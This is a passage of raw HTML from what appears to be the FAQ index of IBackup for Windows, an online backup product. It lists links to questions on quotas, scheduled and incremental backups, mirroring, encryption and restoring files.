/><a name="gen"></a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td width="530"><a href="#gen1" class="linkbody">What is IBackup for Windows?</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#gen2" class="linkbody">If I keep on performing backups,            will I use up my quota quickly?</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#gen3" class="linkbody">Does IBackup support files            larger than 2GB?</a> </td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#gen4" class="linkbody">Does IBackup for Windows            support backing up of mapped drives? </a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#gen5" class="linkbody">I received a quota overuse            email. What should I do? </a></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#gen6" class="linkbody">Are there            any special settings user should be aware of while running            IBackup for Windows on a laptop. For example, Standby mode/            Idle modes.</a></p></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#gen7" class="linkbody">I have            deleted some unwanted files/folders from my IBackup account.            However, the ‘Quota used’ does not change. How do            I know the exact quota used?</a></p></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#gen8" class="linkbody">Which            executables of IBackup for Windows application require firewall            permission to access the Internet? </a></p></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#gen9" class="linkbody">Which            are the installation modes available for IBackup for Windows            to run scheduled backup jobs? </a></p></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#gen10" class="linkbody">How do I view my transfer            logs using IBackup for Windows?</a> </td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#gen11" class="linkbody">Does IBackup for Windows            uses Delta Blocking technology?</a></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#gen12" class="linkbody">What            is the ideal solution for online backups of huge initial backup            sizes, say 100 Gigabytes of data?</a></p></td>       </tr>     </table></td>   </tr> </table> <table width="570" border="0" cellspacing="0" cellpadding="0">   <tr>     <td width="5"> </td>     <td><table width="100%" border="0" cellspacing="2" cellpadding="2">       <tr>         <td colspan="2"> </td>       </tr>       <tr>         <td colspan="2"><img src="images/txtibw_features.gif" width="196" height="27" /><a name="fea"></a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td width="530"><a href="#fea1" class="linkbody">Interactive backups using            IBackup for Windows</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#fea2" class="linkbody">Scheduled backups using IBackup            for Windows</a> </td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#fea3" class="linkbody">Incremental backups with            IBackup for Windows</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#fea4" class="linkbody">E-Mail notification of Backup            Status</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#fea5" class="linkbody">What is Snapshot feature?            How do you enable snapshots? </a></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><a href="#fea6" class="linkbody">How does the mirroring option            work? </a></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><a href="#fea7" class="linkbody">If I backup data from 2 different            computers, can I use 'mirror' option?</a> </td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#fea8" class="linkbody">With earlier versions of            IBackup for Windows, I was able to specify a destination folder            within the 'My IBackup' folder. It seems I cannot do this with            latest version. How do I specify a destination folder for backups?</a><a href="#fea9" class="linkbody"></a></p></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><a href="#fea9" class="linkbody">Is there a one button backup            option? </a></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#fea10" class="linkbody">How do I switch the time            stamp of the files/ folders present on the 'My IBackup' view            to a particular time-zone setting?</a></p></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#add6" class="linkbody">What encryption algorithm            is used for encryption during transmission, and encryption on            storage? How do I setup it up?</a></p></td>       </tr>              <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><a href="#fea11" class="linkbody">How do I search files in            my account using IBackup for Windows? </a></td>       </tr>                                               </table></td>   </tr> </table> <table width="570" border="0" cellspacing="0" cellpadding="0">   <tr>     <td width="5"> </td>     <td><table width="100%" border="0" cellspacing="2" cellpadding="2">       <tr>         <td colspan="2"> </td>       </tr>       <tr>         <td colspan="2"><img src="images/txtibw_backup.gif" width="196" height="27" /><a name="bac"></a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td width="531"><a href="#br1" class="linkbody">How can I backup my server            using IBackup For Windows?</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#br2" class="linkbody">Suggestions for backing up            C Drive</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#br3" class="linkbody">Will IBackup for Windows retain            the date and time of the files being backed up?</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#br4" class="linkbody">How do I backup from multiple            computers into my IBackup Account?</a></td>       </tr>       <tr>         <td width="12"><img src="images/ib_06_arw2.gif" width="12" height="12" /></td>         <td><a href="#br5" class="linkbody">How can I exclude custom files/folders            from my backups?</a></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#br9" class="linkbody">What does IBackup for Windows            do if the Internet connection is interrupted during a backup            session?</a></p></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><p align="justify"><a href="#br10" class="linkbody">Suppose IBackup for Windows            misses a backup session (ex: The computer has been abruptly            turned off) or if the session has been interrupted, when will            IBackup for Windows try to resume the session? Would it be immediately            upon reboot or at the next scheduled time? </a></p></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><a href="#br11" class="linkbody">I lost a file on my desktop            which was probably backed up 4 days ago, how do I restore? </a></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/ib_06_arw2.gif" width="12" height="12" vspace="2" /></td>         <td><a href="#br12" class="linkbody">How do I restore files/folders            from my IBackup account?</a></td>       </tr>     </table></td>   </tr> </table> <table width="570" border="0" cellspacing="0" cellpadding="0">   <tr>     <td width="5"> </td>     <td><table width="100%" b..